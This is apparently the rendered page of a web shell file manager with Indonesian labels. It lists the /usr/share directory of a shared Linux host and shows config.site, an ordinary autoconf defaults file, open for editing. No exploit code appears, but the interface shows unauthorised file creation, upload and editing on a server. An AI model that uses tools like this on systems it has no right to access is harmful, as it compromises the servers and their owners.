PATH: //proc/self/root/usr/share
FILE_BARU
CREATE
FOLDER_BARU
MKDIR
UPLOAD_FILE
GO
[ .. KEMBALI ]
📁 Modules/
X
📁 aclocal/
X
📁 aclocal-1.16/
X
📁 adobe/
X
📁 alt-php-xray-tasks/
X
📁 autoconf/
X
📁 automake-1.16/
X
📁 awk/
X
📁 bash-completion/
X
📁 bison/
X
📁 cmake/
X
📄 config.site
↓
X
📁 cracklib/
X
📁 crypto-policies/
X
📁 emacs/
X
📁 enchant/
X
📁 file/
X
📁 fontconfig/
X
📁 fonts/
X
📁 ghostscript/
X
📁 git-core/
X
📁 gnupg/
X
📁 groff/
X
📁 i18n/
X
📁 i360-php-opts/
X
📁 icu/
X
📁 imunify360/
X
📁 l.v.e-manager/
X
📁 libgpg-error/
X
📁 libtool/
X
📁 locale/
X
📁 lve-stats/
X
📄 magic
↓
X
📁 man/
X
📁 misc/
X
📁 modulefiles/
X
📁 myspell/
X
📁 mysql/
X
📁 nano/
X
📁 pam.d/
X
📁 passenger/
X
📁 perl5/
X
📁 python-cllib/
X
📁 snmp/
X
📁 tabset/
X
📁 tcl8/
X
📁 tcl8.6/
X
📁 terminfo/
X
📁 vim/
X
📁 xml/
X
📁 zoneinfo/
X
📁 zsh/
X
SAVING...
BERHASIL DIUBAH!
EDITING: config.site
# This is the config.site file to satisfy FHS defaults when installing below # /usr. # # You may override this file by your config.site using the CONFIG_SITE env # variable. # # Note: This file includes also RHEL/Fedora fix for installing libraries into # "/lib/lib64" on 64bit systems. if test -n "$host"; then # skip when cross-compiling return 0 fi if test "$prefix" = /usr \ || { test "$prefix" = NONE && test "$ac_default_prefix" = /usr ; } then test "$sysconfdir" = '${prefix}/etc' && sysconfdir=/etc test "$sharedstatedir" = '${prefix}/com' && sharedstatedir=/var test "$localstatedir" = '${prefix}/var' && localstatedir=/var ARCH=`uname -m` for i in x86_64 ppc64 s390x aarch64; do if test $ARCH = $i; then test "$libdir" = '${exec_prefix}/lib' && libdir='${exec_prefix}/lib64' break fi done fi
SIMPAN PERUBAHAN